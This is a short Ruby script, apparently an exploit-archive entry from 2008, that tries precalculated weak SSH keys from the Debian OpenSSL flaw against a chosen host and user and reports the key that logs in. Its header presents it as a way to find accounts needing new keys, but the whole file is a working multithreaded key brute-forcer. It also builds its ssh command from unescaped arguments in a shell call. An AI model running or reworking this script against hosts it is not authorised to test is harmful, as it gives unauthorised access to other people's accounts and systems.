#!/usr/bin/ruby # # Debian SSH Key Tester # L4teral # # This tool helps to find user accounts with weak SSH keys # that should be regenerated with an unaffected version # of openssl. # # You will need the precalculated keys provided by HD Moore # See http://metasploit.com/users/hdm/tools/debian-openssl/ # for further information. # # Usage: # debian_openssh_key_test.rb # require 'thread' THREADCOUNT = 10 KEYSPERCONNECT = 3 queue = Queue.new threads = [] keyfiles = [] host = ARGV.shift or raise "no host given!" user = ARGV.shift or raise "no user given!" keysdir = ARGV.shift or raise "no key dir given!" Dir.new(keysdir).each do |f| if f =~ /\d+$/ then keyfiles << f queue << f end end totalkeys = queue.length currentkey = 1 THREADCOUNT.times do |i| threads << Thread.new(i) do |j| while !queue.empty? keys = [] KEYSPERCONNECT.times { keys << queue.pop unless queue.empty? } keys.map! { |f| f = File.join(keysdir, f) } keys.each do |k| puts "testing key #{currentkey}/#{totalkeys} #{k}..." currentkey += 1 end system "ssh -l #{user} -o PasswordAuthentication=no -i #{keys.join(" -i ")} #{host} \"exit\" &>/dev/null" if $? == 0 then keys.each do |k| system "ssh -l #{user} -o PasswordAuthentication=no -i #{k} #{host} \"exit\" &>/dev/null" if $? == 0 then puts "KEYFILE FOUND: \n#{k}" exit end end end end end end trap("SIGINT") do threads.each { |t| t.exit() } exit end threads.each { |t| t.join } # milw0rm.com [2008-05-16]